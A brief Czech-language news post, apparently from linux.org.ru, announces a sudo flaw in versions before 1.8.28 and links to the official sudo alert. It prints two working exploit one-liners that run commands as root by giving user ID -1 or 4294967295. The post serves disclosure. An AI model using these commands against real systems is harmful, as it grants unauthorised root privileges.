Chyba v sudo umožňuje spuštění libovolného spustitelného souboru jako root, pokud /etc/sudoers umožňuje jeho spuštění jako ostatní uživatelé a je zakázáno pro roota.
Využití chyby je velmi jednoduché:
sudo -u#-1 id -u
nebo:
sudo -u#4294967295 id -u
Chyba je přítomna ve všech verzích sudo před 1.8.28
Podrobnosti:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
Zdroj: linux.org.ru